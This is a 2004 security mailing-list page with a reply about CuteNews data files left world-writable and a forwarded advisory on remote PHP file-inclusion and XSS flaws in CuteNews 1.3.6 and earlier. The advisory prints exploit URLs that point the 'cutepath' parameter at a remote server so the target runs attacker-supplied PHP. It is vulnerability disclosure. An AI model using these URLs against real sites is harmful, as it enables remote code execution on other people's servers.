[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: CuteNews News.txt writable to world

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Sunday 29 August 2004 10:39, e0r wrote:
> Date: August 29, 2004
> Vender: http://www.cutephp.com/
> Program: CuteNews
> Versions affected: => 1.3.6
> Bug: CuteNews News.txt writable to world
> Type:
> Author: e0r
>         www: http://www.rootthief.com/
>         team: !Sui-Generes (!Sui)
>         Email: homicidal @ gmail . com
> -----------------------------

 This is not realy a code vulnerability, the problem is in the documentation
where you can read:

 "Now You must CHMOD the the directory cutenews/data/ and all files and
folders under the data/ directory must be also chmod'ed to 777"

 You can do that without 777 permisions using some alternative methods;
setting directory group as apache user, or using apache suexec.


 However CuteNews have some AUTHENTIC vulnerabilities.


- --
- -----------------------------------------------------------------------
Albert Puigsech Galicia

http://www.7a69ezine.org/~apuigsech
- -----------------------------------------------------------------------
Este e-mail  puede contener  información confidencial y/o privilegiada.
Si el presente mensaje no  va dirigido a  su persona  (o lo ha recibido
por error) por favor,  notifíquelo inmediatamente  al emisor y destruya
este e-mail. Cualquier divulgación,  copia o distribución no autorizada
del material contenido en este e-mail queda prohibida.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBM670iLW5f5WBvGcRAqfiAJ9z/EuWShz9Zby5/HDznKN+jZk4zQCfRKqn
QDNQZX3iHoXV1U6DVx+NAkQ=
=yogr
-----END PGP SIGNATURE-----
--- Begin Message --- 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------
  7a69ezine Advisories                               7a69Adv#14
- ------------------------------------------------------------------
  http://www.7a69ezine.org
- ------------------------------------------------------------------

Title:  CuteNews multiple vulnerabilities

Author: Albert Puigsech Galicia - <ripe@xxxxxxxxxxxxx>

Software: CuteNews

Versions: => 1.3.6

Remote: yes

Exploit: yes

Severity: High

- ------------------------------------------------------------------



I. Introduction

 CuteNews is a simple news management system that suports coments, archives, 
avatars, backups, and other issues. It's easy to install beause doesn't need 
any database backend. You can get more informatión and download it from; 
http://cutephp.com/cutenews/


II. Description

 There are multiple well know php include vulnerabilities that can allow 
remote users to execute php code with http server privileges. There are also 
some XSS vulnerabilities.


III. Exploit

 You can modify some php require() calls to execute remote php files located, 
for example, on your own http server.

 - This will rexecute 'http://remote/data/config.php':

  http://vulnerable/show_archives.php?cutepath=http://remote/
  http://vulnerable/show_news.php?cutepath=http://remote/ 

   
IV. Patch
 
 Not Yet.


V. Timeline

 No timeline


VI. Extra data

 For spanish information you can visit Advisories section on 7a69ezine
website:

 http://www.7a69ezine.org/avisos/propios
 


- -- 
- -----------------------------------------------------------------------
Albert Puigsech Galicia

http://www.7a69ezine.org/~apuigsech
- -----------------------------------------------------------------------
Este e-mail  puede contener  información confidencial y/o privilegiada.
Si el presente mensaje no  va dirigido a  su persona  (o lo ha recibido
por error) por favor,  notifíquelo inmediatamente  al emisor y destruya
este e-mail. Cualquier divulgación,  copia o distribución no autorizada
del material contenido en este e-mail queda prohibida.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBM65riLW5f5WBvGcRAoUEAJ9QI4ADFqKMLEMDCxbzAR9c94O3QgCfSc4D
kauk5bXjk+cYidR1aupRqYI=
=XNEe
-----END PGP SIGNATURE-----

--- End Message ---